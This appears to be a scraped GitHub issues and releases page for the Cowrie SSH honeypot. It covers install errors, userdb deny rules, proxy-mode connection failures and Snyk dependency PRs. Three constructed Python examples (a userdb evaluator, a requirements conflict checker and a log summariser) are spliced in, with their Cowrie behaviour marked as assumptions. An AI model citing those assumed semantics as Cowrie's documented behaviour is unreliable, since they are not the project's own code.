      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 617, in run
        runApp(config)
      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/scripts/twistd.py", line 25, in runApp
        _SomeApplicationRunner(config).run()
      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 348, in run
        self.application = self.createOrGetApplication()
      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 413, in createOrGetApplication
        application = getApplication(self.config, passphrase)
    --- <exception caught here> ---
      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/app.py", line 424, in getApplication
        application = service.loadApplication(filename, style, passphrase)
      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/application/service.py", line 411, in loadApplication
        passphrase)
      File "/home/michel/envirt/local/lib/python2.7/site-packages/Twisted-16.0.0-py2.7-linux-i686.egg/twisted/persisted/sob.py", line 224, in loadValueFromFile
        eval(codeObj, d, d)
      File "kippo.tac", line 26, in <module>
        import kippo.core.auth
      File "/home/michel/kippo/kippo-master/kippo/core/auth.py", line 102, in <module>
        class HoneypotPasswordChecker:
      File "/home/michel/kippo/kippo-master/kippo/core/auth.py", line 105, in HoneypotPasswordChecker
        credentialInterfaces = (credentials.IUsernamePassword, credentials.IPluggableAuthenticationModules)
    exceptions.AttributeError: 'module' object has no attribute 'IPluggableAuthenticationModules'

    Failed to load application: 'module' object has no attribute 'IPluggableAuthenticationModules'

    Please help me. Thanks

    question 
    opened by miha237 22
  • userdb not checked

    I have copied the userdb.example to userdb.txt in the etc folder, by running this command: [email protected] cp userdb.example eserdb.txt. I then stopped cowrie and started it again.

    However, I still can access the honeypot with username root, and password root, even though in the userdb, it says root:x:!root

    question 
    opened by RunnyRun 21
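Added example, not Cowrie's own auth code: a rule evaluator for the userdb.txt syntax, implementing the `!` deny prefix shown in the question (`root:x:!root`) together with the `*` any-password wildcard and `/regex/` patterns that the project's userdb.example documents. The wildcard and regex forms and the first-match evaluation order are assumptions about Cowrie taken from that example file; the sample userdb is constructed. Running it shows which rule fires for a given login attempt, so that the expected verdict for root/root can be compared with what the running honeypot actually does.

```python
import re
from typing import List, Tuple, Union

Rule = Union[bytes, re.Pattern]
Entry = Tuple[Rule, Rule, bool]  # (username rule, password rule, allow?)


def _compile(field: bytes) -> Rule:
    # ASSUMPTION: "/regex/" or "/regex/i" is a pattern; anything else is a literal
    m = re.match(rb"^/(.+)/(i)?$", field)
    if m:
        return re.compile(m.group(1), re.IGNORECASE if m.group(2) else 0)
    return field


def _matches(rule: Rule, value: bytes) -> bool:
    if isinstance(rule, bytes):
        return rule == b"*" or rule == value  # ASSUMPTION: "*" matches any value
    return rule.search(value) is not None


def load_userdb(text: bytes) -> List[Entry]:
    entries: List[Entry] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"#"):
            continue
        # username:uid:password -- the uid field is ignored; a leading "!" on the
        # password turns the line into a deny rule (as in root:x:!root)
        login, _uid, passwd = line.split(b":", 2)
        allow = not passwd.startswith(b"!")
        if not allow:
            passwd = passwd[1:]
        entries.append((_compile(login), _compile(passwd), allow))
    return entries


def check_login(entries: List[Entry], username: bytes, password: bytes) -> bool:
    """The first entry whose username and password rules both match decides;
    with no matching entry the attempt is rejected (ASSUMPTION: first-match order)."""
    for login_rule, pw_rule, allow in entries:
        if _matches(login_rule, username) and _matches(pw_rule, password):
            return allow
    return False


# Constructed userdb modelled on userdb.example: deny root/root and root/123456,
# deny any root password containing "honeypot", then accept any other root password.
SAMPLE_USERDB = b"""\
# username:uid:password
root:x:!root
root:x:!123456
root:x:!/honeypot/i
root:x:*
richard:x:*
"""

if __name__ == "__main__":
    rules = load_userdb(SAMPLE_USERDB)
    for user, pw in [(b"root", b"root"), (b"root", b"hunter2"),
                     (b"root", b"MyHoneypot"), (b"bob", b"bob")]:
        verdict = "accept" if check_login(rules, user, pw) else "reject"
        print(f"{user.decode()}/{pw.decode()} -> {verdict}")
```

Because evaluation stops at the first matching line, deny rules must come before the `root:x:*` catch-all; a deny rule placed after the wildcard never fires.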
  • How do you customize the honeypot filesystem?

    From the documentation, it seems that all I'd need to do to replace Cowrie's default filesystem is to do:

    • Copy a new file system to honeyfs
    • Run ./bin/createfs -l honeyfs -o data/fs.pickle

    When I tried to do this from an OpenWRT filesystem, the commands executed successfully, but commands in the honeypot (e.g. ls, cp, rm) don't work. /bin/busybox works, but running /bin/busybox ls errors out with applet not found.

    I'm using Python 3.5 on Ubuntu 16.04.

    question 
    opened by supriyo-biswas 21
  • Can't stop Cowrie

    Been playing around with Cowrie and am loving it. But it won't stop for me unless I kill the process. I'm starting it by ~/cowrie/bin/./cowrie start. Doing a ~/cowrie/bin/./cowrie stop doesn't stop it though. There is no error message at console from the stop command and it just returns me to a prompt after I push enter.

    I have to lookup the process with "ps aux" and kill it by the PID. Is this normal? Running Ubuntu Server 16.

    opened by biggen1684 20
  • commands not executing when directory path contains symbolic links

    Hi Michel,

    I can't explain why but my Cowrie doesn't accept the usual commands like "ls", "cat", "ping":

    bash: cat: command not found
    bash: ls: command not found

    wget, curl, help, the (customized) txtcmds works fine.

    I'm running Centos 7, I have customized the honeyfs files, txtcmds and generated a filesystem with createfs.py (cleaned with fsctl.py)

    Any hints ?

    Regards.

    bug 
    opened by AbyssAndreal 20
  • [Snyk] Security upgrade setuptools from 39.0.1 to 65.5.1

    This PR was automatically created by Snyk using the credentials of a real user.


    Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • requirements-output.txt
    ⚠️ Warning
    slackclient 2.9.4 requires aiohttp, which is not installed.
    service-identity 21.1.0 requires cryptography, which is not installed.
    pyOpenSSL 22.1.0 requires cryptography, which is not installed.
    geoip2 4.6.0 requires aiohttp, which is not installed.
    
    

    Vulnerabilities that will be fixed

    By pinning:

    Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity
    :---:|:---|:---|:---|:---|:---
    medium severity | 551/1000<br/>Why? Recently disclosed, Has a fix available, CVSS 5.3 | Regular Expression Denial of Service (ReDoS)<br/>SNYK-PYTHON-SETUPTOOLS-3180412 | setuptools:<br/>39.0.1 -> 65.5.1 | No | No Known Exploit

    (*) Note that the real score may have changed since the PR was raised.

    Some vulnerabilities couldn't be fully fixed and so Snyk will still find them when the project is tested again. This may be because the vulnerability existed within more than one direct dependency, but not all of the affected dependencies could be upgraded.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Regular Expression Denial of Service (ReDoS)

    opened by micheloosterhof 1
  • [Snyk] Security upgrade setuptools from 39.0.1 to 65.5.1

    This PR was automatically created by Snyk using the credentials of a real user.


    Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • requirements.txt
    ⚠️ Warning
    service-identity 21.1.0 requires cryptography, which is not installed.
    pyOpenSSL 22.1.0 requires cryptography, which is not installed.
    
    

    Vulnerabilities that will be fixed

    By pinning:

    Severity | Priority Score (*) | Issue | Upgrade | Breaking Change | Exploit Maturity
    :---:|:---|:---|:---|:---|:---
    medium severity | 551/1000<br/>Why? Recently disclosed, Has a fix available, CVSS 5.3 | Regular Expression Denial of Service (ReDoS)<br/>SNYK-PYTHON-SETUPTOOLS-3180412 | setuptools:<br/>39.0.1 -> 65.5.1 | No | No Known Exploit

    (*) Note that the real score may have changed since the PR was raised.

    Some vulnerabilities couldn't be fully fixed and so Snyk will still find them when the project is tested again. This may be because the vulnerability existed within more than one direct dependency, but not all of the affected dependencies could be upgraded.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Regular Expression Denial of Service (ReDoS)

    opened by micheloosterhof 1
  • output_mysql: No result set to fetch from.

    output_mysql: No result set to fetch from.

    Hello,

    I have a new Cowrie installation under a Python 3.9.13 virtualenv. List of packages:

    Package            Version
    ------------------ ---------
    appdirs            1.4.4
    attrs              22.1.0
    Automat            22.10.0
    bcrypt             4.0.1
    certifi            2022.9.24
    cffi               1.15.1
    charset-normalizer 2.1.1
    configparser       5.2.0
    constantly         15.1.0
    cryptography       38.0.4
    hyperlink          21.0.0
    idna               3.4
    incremental        22.10.0
    mysql-connector    2.2.9
    packaging          21.3
    pip                22.3.1
    pyasn1             0.4.8
    pyasn1-modules     0.2.8
    pycparser          2.21
    pyOpenSSL          22.1.0
    pyparsing          3.0.9
    python-dateutil    2.8.2
    requests           2.28.1
    service-identity   21.1.0
    setuptools         65.6.3
    six                1.16.0
    tftpy              0.8.2
    treq               22.2.0
    Twisted            22.4.0
    typing_extensions  4.4.0
    urllib3            1.26.13
    wheel              0.38.4
    zope.interface     5.5.2
    

    I am getting the error below in cowrie.log:

    2022-12-06T07:29:34.709158Z [HoneyPotSSHTransport,3,xx.xx.xx.xx] Rollback failed
            Traceback (most recent call last):
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/threadpool.py", line 260, in <lambda>
                inContext.theWork = lambda: context.call(  # type: ignore[attr-defined]
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 117, in callWithContext
                return self.currentContext().callWithContext(ctx, func, *args, **kw)
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/python/context.py", line 82, in callWithContext
                return func(*args, **kw)
              File "/home/cowrie/COWRIE/src/cowrie/output/mysql.py", line 38, in _runInteraction
                return adbapi.ConnectionPool._runInteraction(self, interaction, *args, **kw)
            --- <exception caught here> ---
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/enterprise/adbapi.py", line 449, in _runInteraction
                conn.rollback()
              File "/home/cowrie/cowrie-env/lib/python3.9/site-packages/twisted/enterprise/adbapi.py", line 66, in rollback
                raise ConnectionLost()
            twisted.enterprise.adbapi.ConnectionLost: 
    
    2022-12-06T07:29:34.709757Z [-] output_mysql: MySQL Error: (-1, 'No result set to fetch from.', None)
    
    opened by bentech4u 3
  • [Snyk] Security upgrade protobuf from 3.20.1 to 3.20.2

    [Snyk] Security upgrade protobuf from 3.20.1 to 3.20.2

    Snyk has created this PR to fix one or more vulnerable packages in the `pip` dependencies of this project.

    Changes included in this PR

    • Changes to the following files to upgrade the vulnerable dependencies to a fixed version:
      • requirements-output.txt
    ⚠️ Warning
    slackclient 2.9.4 requires aiohttp, which is not installed.
    service-identity 21.1.0 requires cryptography, which is not installed.
    pyOpenSSL 22.1.0 requires cryptography, which is not installed.
    mysql-connector-python 8.0.31 has requirement protobuf<=3.20.1,>=3.11.0, but you have protobuf 4.21.10.
    geoip2 4.6.0 requires aiohttp, which is not installed.
    
    

    Vulnerabilities that will be fixed

    By pinning:

    Severity | Issue | Upgrade | Breaking Change | Exploit Maturity
    :---:|:---|:---|:---|:---
    medium severity | Denial of Service (DoS) SNYK-PYTHON-PROTOBUF-3031740 | protobuf: 3.20.1 -> 3.20.2 | No | No Known Exploit

    Some vulnerabilities couldn't be fully fixed and so Snyk will still find them when the project is tested again. This may be because the vulnerability existed within more than one direct dependency, but not all of the affected dependencies could be upgraded.

    Check the changes in this PR to ensure they won't cause issues with your project.


    Note: You are seeing this because you or someone else with access to this repository has authorized Snyk to open fix PRs.

    For more information: 🧐 View latest project report

    🛠 Adjust project settings

    📚 Read more about Snyk's upgrade and patch logic


    Learn how to fix vulnerabilities with free interactive lessons:

    🦉 Learn about vulnerability in an interactive lesson of Snyk Learn.

    opened by snyk-bot 1
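The dependency warnings in the PR body above are exactly what a reviewer has to verify by hand before merging a bot-generated pin: one package's new version can fall outside the range another installed distribution declares. The following is an added example, not Snyk or Cowrie code. It is a minimal `pip check`-style pass that parses a pinned requirements file and tests each pin against the constraints other distributions declare. The requirements excerpt and the `INSTALLED_REQUIRES` dict are constructed stand-ins (a real run would read them from `importlib.metadata`), and the version comparison is simplified to numeric dotted releases.

```python
"""Check pinned requirements against constraints declared by other distributions.

Added example, not project code. Inputs are constructed and modelled on the
"has requirement protobuf<=3.20.1,>=3.11.0, but you have protobuf 4.21.10"
warning quoted in the PR above.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed excerpt of a pinned requirements file (not the project's real file).
REQUIREMENTS_OUTPUT = """\
# requirements-output.txt (constructed excerpt)
mysql-connector-python==8.0.31
protobuf==4.21.10
geoip2==4.6.0
requests==2.28.1
"""

# Installed distribution -> requirement strings it declares (constructed values;
# a real tool would take them from importlib.metadata.requires(dist)).
INSTALLED_REQUIRES: Dict[str, List[str]] = {
    "mysql-connector-python": ["protobuf<=3.20.1,>=3.11.0"],
    "geoip2": ["aiohttp>=3.6.2,<4.0.0", "requests>=2.24.0,<3.0.0"],
}

NAME_RE = re.compile(r"^\s*([A-Za-z0-9][A-Za-z0-9._-]*)")
PIN_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*==\s*([0-9][0-9.]*)$")
SPEC_RE = re.compile(r"(==|!=|<=|>=|<|>)\s*([0-9][0-9.]*)")


def normalize(name: str) -> str:
    """PEP 503 project-name normalisation: lower-case, runs of -_. become one dash."""
    return re.sub(r"[-_.]+", "-", name).lower()


def version_key(version: str, width: int = 4) -> Tuple[int, ...]:
    """Simplified PEP 440 release key: numeric segments, zero-padded so 3.20 == 3.20.0."""
    parts = [int(p) for p in version.split(".")]
    return tuple(parts + [0] * (width - len(parts)))


def satisfies(version: str, spec: str) -> bool:
    """True when `version` meets every comparison clause in `spec`, e.g. '<=3.20.1,>=3.11.0'."""
    v = version_key(version)
    for op, target in SPEC_RE.findall(spec):
        t = version_key(target)
        ok = {"==": v == t, "!=": v != t, "<=": v <= t, ">=": v >= t, "<": v < t, ">": v > t}[op]
        if not ok:
            return False
    return True


def parse_pins(text: str) -> Dict[str, str]:
    """Return {normalised name: pinned version} for every 'name==version' line."""
    pins: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        m = PIN_RE.match(line) if line else None
        if m:
            pins[normalize(m.group(1))] = m.group(2)
    return pins


def find_conflicts(pins: Dict[str, str],
                   installed: Dict[str, List[str]]) -> List[Tuple[str, str, Optional[str]]]:
    """Return (requirer, requirement, pinned_version) for each violated constraint,
    and (requirer, requirement, None) when the required package is not pinned at all."""
    conflicts: List[Tuple[str, str, Optional[str]]] = []
    for requirer, reqs in installed.items():
        for req in reqs:
            m = NAME_RE.match(req)
            dep, spec = normalize(m.group(1)), req[m.end():]
            pinned = pins.get(dep)
            if pinned is None:
                conflicts.append((requirer, req, None))
            elif not satisfies(pinned, spec):
                conflicts.append((requirer, req, pinned))
    return conflicts


if __name__ == "__main__":
    for requirer, req, pinned in find_conflicts(parse_pins(REQUIREMENTS_OUTPUT), INSTALLED_REQUIRES):
        state = f"but you have {pinned}" if pinned else "which is not pinned"
        print(f"{requirer} has requirement {req}, {state}")
```

Running the script reproduces the two kinds of warning in the PR: an out-of-range pin (protobuf) and a missing dependency (aiohttp). Because the check is applied to the proposed pin rather than the current one, it also shows that 3.20.2, the version this PR moves to, does not satisfy the `<=3.20.1` clause either, which is the kind of follow-on break a reviewer wants to see before merging.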
  • Unable to connect to honeypot VM through proxy

    Unable to connect to honeypot VM through proxy

    Hello,

    I am trying to deploy cowrie in proxy mode with the following settings:

    backend = proxy
    
    # Guest details (for a generic x86-64 guest, like Ubuntu)
    guest_hypervisor = qemu
    
    backend = pool
    backend_ssh_host = localhost
    backend_ssh_port = 2022
    
    pool_max_vms = 4
    pool = local
    
    # Endpoint to listen on for incoming SSH connections.
    listen_endpoints = tcp:9090:interface=0.0.0.0
    

    Everything not shown above is set to its default value, except for the real backend credentials. iptables is configured to redirect port 22 to port 9090.

    Successfully logging in to the honeypot through PuTTY does not redirect me to the VM; instead it shows the following error message:

    [image: error message screenshot]

    This is how it looks in logs:

    2022-11-15T14:40:02.714110Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: x.x.x.x:x (10.0.0.4:9090) [session: 11699cf73924]
    2022-11-15T14:40:02.724076Z [FrontendSSHTransport,520,x.x.x.x] Remote SSH version: SSH-2.0-PuTTY_Release_0.76
    2022-11-15T14:40:02.733713Z [backend_pool.pool_server.PoolServerFactory] Received connection from 127.0.0.1:41042
    2022-11-15T14:40:02.734290Z [Uninitialized] Connected to backend pool
    2022-11-15T14:40:02.734577Z [PoolServer,521,127.0.0.1] Requesting a VM for attacker @ x.x.x.x
    2022-11-15T14:40:02.734771Z [PoolServer,521,127.0.0.1] Providing VM id 0
    2022-11-15T14:40:02.735102Z [PoolClient,client] Got backend data from pool: 192.168.150.217:22
    2022-11-15T14:40:02.735196Z [PoolClient,client] Snapshot file: /home/cowrie/cowrie/var/lib/cowrie/snapshots/snapshot-ubuntu18.04-75999260d50340aa9098062da1650500.qcow2
    2022-11-15T14:40:02.735334Z [cowrie.ssh_proxy.client_transport.BackendSSHFactory#info] Starting factory <cowrie.ssh_proxy.client_transport.BackendSSHFactory object at 0x7f8a9c87f370>
    2022-11-15T14:40:02.782461Z [FrontendSSHTransport,520,x.x.x.x] SSH client hassh fingerprint: 5b7713a9ef2d162b16ea018fa8d40f02
    2022-11-15T14:40:02.783927Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ssh-ed25519'
    2022-11-15T14:40:02.784027Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] outgoing: b'aes256-ctr' b'hmac-sha1' b'none'
    2022-11-15T14:40:02.784101Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] incoming: b'aes256-ctr' b'hmac-sha1' b'none'
    2022-11-15T14:40:02.850464Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] NEW KEYS
    2022-11-15T14:40:02.850962Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#debug] starting service b'ssh-userauth'
    2022-11-15T14:40:04.530477Z [Uninitialized] Connected to SSH backend at b'192.168.150.217'
    2022-11-15T14:40:04.530869Z [Uninitialized] Connected to honeypot backend
    2022-11-15T14:40:05.694227Z [cowrie.ssh_proxy.userauth.ProxySSHAuthServer#debug] b'student' trying auth b'none'
    2022-11-15T14:40:10.343627Z [FrontendSSHTransport,520,x.x.x.x] Connection to backend not ready, buffering packet from frontend
    2022-11-15T14:40:10.344638Z [cowrie.ssh_proxy.userauth.ProxySSHAuthServer#debug] b'student' trying auth b'password'
    2022-11-15T14:40:10.345534Z [FrontendSSHTransport,520,x.x.x.x] login attempt [b'student'/b'student'] succeeded
    2022-11-15T14:40:10.362593Z [FrontendSSHTransport,520,x.x.x.x] Initialized emulated server as architecture: linux-x64-lsb
    2022-11-15T14:40:10.419995Z [FrontendSSHTransport,520,x.x.x.x] Connection to backend not ready, buffering packet from frontend
    # this might be the point where the error shows up
    2022-11-15T14:40:33.175725Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] kex alg=b'curve25519-sha256' key alg=b'ecdsa-sha2-nistp256'
    2022-11-15T14:40:33.176223Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] outgoing: b'aes256-ctr' b'hmac-sha2-512' b'none'
    2022-11-15T14:40:33.176309Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] incoming: b'aes256-ctr' b'hmac-sha2-512' b'none'
    2022-11-15T14:40:41.233811Z [cowrie.ssh_proxy.client_transport.BackendSSHTransport#debug] NEW KEYS
    2022-11-15T14:40:41.234285Z [BackendSSHTransport,client] Backend Connection Secured
    2022-11-15T14:40:41.251355Z [BackendSSHTransport,client] Will auth with backend: x/x
    2022-11-15T14:40:41.251870Z [BackendSSHTransport,client] got channel b'session' request
    2022-11-15T14:40:54.764575Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#info] connection lost
    2022-11-15T14:40:54.765091Z [FrontendSSHTransport,520,x.x.x.x] Connection lost after 50 seconds
    2022-11-15T14:40:54.774787Z [BackendSSHTransport,client] Lost connection with the pool backend: id 0
    2022-11-15T14:40:54.775126Z [cowrie.ssh_proxy.client_transport.BackendSSHFactory#info] Stopping factory <cowrie.ssh_proxy.client_transport.BackendSSHFactory object at 0x7f8a9c87f370>
    2022-11-15T14:40:54.775420Z [PoolServer,521,127.0.0.1] Freeing VM 0
    

    Sometimes there's different logged events after successful login attempt:

    2022-11-15T01:00:45.902697Z [BackendSSHTransport,client] [SSH] Detected Public Key Auth - Disabling!
    2022-11-15T01:00:53.399529Z [FrontendSSHTransport,57,x.x.x.x] Unhandled Error
            Traceback (most recent call last):
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py", line 96, in callWithLogger
                return callWithContext({"system": lp}, func, *args, **kw)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/log.py", line 80, in callWithContext
                return context.call({ILogContext: newCtx}, func, *args, **kw)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/context.py", line 117, in callWithContext
                return self.currentContext().callWithContext(ctx, func, *args, **kw)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/python/context.py", line 82, in callWithContext
                return func(*args, **kw)
            --- <exception caught here> ---
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/posixbase.py", line 487, in _doReadOrWrite
                why = selectable.doRead()
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/tcp.py", line 248, in doRead
                return self._dataReceived(data)
              File "/home/cowrie/cowrie/cowrie-env/lib/python3.8/site-packages/twisted/internet/tcp.py", line 253, in _dataReceived
                rval = self.protocol.dataReceived(data)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/server_transport.py", line 244, in dataReceived
                self.dispatchMessage(message_num, packet[1:])
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/server_transport.py", line 261, in dispatchMessage
                self.packet_buffer(message_num, payload)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/server_transport.py", line 434, in packet_buffer
                self.sshParse.parse_num_packet("[SERVER]", message_num, payload)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/protocols/ssh.py", line 330, in parse_num_packet
                channel = self.get_channel(self.extract_int(4), parent)
              File "/home/cowrie/cowrie/src/cowrie/ssh_proxy/protocols/ssh.py", line 406, in get_channel
                if channel[search] == channel_num:
            builtins.KeyError: 'clientID'
    
    2022-11-15T01:00:53.401422Z [cowrie.ssh_proxy.server_transport.FrontendSSHTransport#info] connection lost
    

    I tried using terminal to log in instead, this however produces different, but still unsuccessful results:

    Error message:

    dispatch_protocol_error: type 7 seq 7
    Connection to x closed by remote host.
    Connection to x closed.
    

    Logged events are the same.

    Expected behavior: after successful authentication, Cowrie connects the attacker to the VM.

    Server (please complete the following information):

    • OS: Linux cowrie 5.15.0-1022-azure 27~20.04.1-Ubuntu SMP x86_64 x86_64 x86_64 GNU/Linux
    • Python: Python 3.8.10
    opened by katsonka 0
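When reading a proxy-mode cowrie.log like the one posted above, the useful numbers are the ones the log does not print directly: how long the attacker waited between the frontend accepting the login and the backend SSH transport becoming usable, and how many frontend packets were buffered in the meantime. The following is an added example, not Cowrie project code. It assumes only the line layout visible in the issue, `<ISO-8601 timestamp>Z [<system>] <message>`, and the message texts quoted there. The sample lines are constructed (a documentation IP replaces the reporter's `x.x.x.x`) and the summary covers a single session; backend transport lines carry no frontend transport id, so correlating them in a multi-session log would need the pool's "Providing VM id" messages, which this example does not attempt.

```python
"""Summarise one Cowrie proxy-mode session from cowrie.log text lines.

Added example, not Cowrie project code. Assumes the line layout seen in the
issue above: "<ISO-8601 timestamp>Z [<system>] <message>".
"""
import re
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Optional, Tuple

# Constructed sample modelled on the posted log; not real traffic.
SAMPLE_LOG = """\
2022-11-15T14:40:02.714110Z [cowrie.ssh.factory.CowrieSSHFactory] New connection: 203.0.113.5:51234 (10.0.0.4:9090) [session: 11699cf73924]
2022-11-15T14:40:02.724076Z [FrontendSSHTransport,520,203.0.113.5] Remote SSH version: SSH-2.0-PuTTY_Release_0.76
2022-11-15T14:40:05.694227Z [cowrie.ssh_proxy.userauth.ProxySSHAuthServer#debug] b'student' trying auth b'none'
2022-11-15T14:40:10.343627Z [FrontendSSHTransport,520,203.0.113.5] Connection to backend not ready, buffering packet from frontend
2022-11-15T14:40:10.345534Z [FrontendSSHTransport,520,203.0.113.5] login attempt [b'student'/b'student'] succeeded
2022-11-15T14:40:10.419995Z [FrontendSSHTransport,520,203.0.113.5] Connection to backend not ready, buffering packet from frontend
2022-11-15T14:40:41.234285Z [BackendSSHTransport,client] Backend Connection Secured
2022-11-15T14:40:54.765091Z [FrontendSSHTransport,520,203.0.113.5] Connection lost after 50 seconds
        Traceback (most recent call last):
"""

LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2}\.\d+Z) \[(?P<system>[^\]]*)\] (?P<msg>.*)$")
NEWCONN_RE = re.compile(r"New connection: (?P<peer>\S+) \((?P<local>[^)]*)\) \[session: (?P<sid>[0-9a-f]+)\]")
LOGIN_RE = re.compile(r"login attempt \[b'(?P<user>[^']*)'/b'(?P<pw>[^']*)'\] (?P<result>succeeded|failed)")
LOST_RE = re.compile(r"Connection lost after (?P<secs>\d+) seconds")


@dataclass
class Event:
    ts: datetime
    system: str
    msg: str


def parse_line(line: str) -> Optional[Event]:
    """Parse one cowrie.log line; traceback continuation lines yield None."""
    m = LINE_RE.match(line.rstrip("\n"))
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S.%fZ").replace(tzinfo=timezone.utc)
    return Event(ts, m["system"], m["msg"])


@dataclass
class ProxySession:
    session_id: str = ""
    peer: str = ""
    client_version: str = ""
    login: Optional[Tuple[str, str, str]] = None  # (user, password, result)
    login_ts: Optional[datetime] = None
    backend_secured_ts: Optional[datetime] = None
    buffered_packets: int = 0
    lost_after: Optional[int] = None


def summarize(text: str) -> ProxySession:
    """Fold the events of a single-session log excerpt into a ProxySession."""
    s = ProxySession()
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        if (m := NEWCONN_RE.search(ev.msg)):
            s.session_id, s.peer = m["sid"], m["peer"]
        elif ev.msg.startswith("Remote SSH version: "):
            s.client_version = ev.msg[len("Remote SSH version: "):]
        elif (m := LOGIN_RE.search(ev.msg)):
            s.login = (m["user"], m["pw"], m["result"])
            if m["result"] == "succeeded":
                s.login_ts = ev.ts
        elif "buffering packet from frontend" in ev.msg:
            s.buffered_packets += 1
        elif ev.system.startswith("BackendSSHTransport") and ev.msg == "Backend Connection Secured":
            s.backend_secured_ts = ev.ts
        elif (m := LOST_RE.search(ev.msg)):
            s.lost_after = int(m["secs"])
    return s


def backend_lag_seconds(s: ProxySession) -> Optional[float]:
    """Seconds between the successful frontend login and the backend transport
    being secured; None when either event is missing from the excerpt."""
    if s.login_ts is None or s.backend_secured_ts is None:
        return None
    return (s.backend_secured_ts - s.login_ts).total_seconds()


if __name__ == "__main__":
    session = summarize(SAMPLE_LOG)
    print(session)
    print("backend lag (s):", backend_lag_seconds(session))
```

On the constructed sample the lag comes out at just under 31 seconds with two buffered frontend packets, which is the window in which an interactive client is sitting on an authenticated but not yet proxied connection. Pointing the same `summarize` at a real excerpt gives a quick way to tell a slow backend (large lag, eventual "Backend Connection Secured") from a backend that never came up (no secured timestamp before "Connection lost").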
Releases(v2.4.0)
  • v2.4.0(Jul 16, 2022)

    Release 2.4.0


    • Deprecate Python 3.7
    • Early support for Python 3.11
    • ThreatJammer output plugin (@diegoparrilla)
    • Telegram output plugin (@Louren)
    • Discord output plugin (@CyberSparkNL)
    • Updated mongodb output plugin
    • Dependency upgrades
    • Docker repo merged with this one
    • wget and curl rewritten using treq.
    • Migrate test framework from trial to unittest (@lazycrazyowl)
    Source code(tar.gz)
    Source code(zip)
  • v2.3.0(Oct 17, 2021)

    Release 2.3.0

    • Deprecate Python 3.6
    • Support Python 3.10
    • Dependency updates
    • MISP Output plugin extension
    • add new public keys ECDSAKeys and ed25519 (#1627)
    • fix userdb.example (#1619)
    • cache url submission to virustotal
    • MySQL connector (#1575) - needs new external dependency mysql-connector-python
    • Fix mysql string expansion (#1565)
    • Rewrite CSIRTG output plugin to use new library version
    • Fixed the Slack output to work with the versions 2.x of slackclient
    • fix MySQL error handling
    • fix tar command
    • limit connections to private address ranges
    • Update GreyNoise Output Script to Use Community API (#1524)
    • Implement getopt-style parsing for uname (#1516)
    • Allow SSLv3 connections for wget and curl
    • Support for 301 redirects in wget
    • Malshare update API (#1472)
    • Remove hpfeeds.py in favour of hpfeeds3.py

    Source code(tar.gz)
    Source code(zip)
  • v2.2.0(Nov 11, 2020)

    Release 2.2.0

    • Deprecate Python 2.7 and 3.5
    • Command substitution with backticks (PeterSufliarsky)
    • Better chmod command line parsing (PeterSufliarsky)
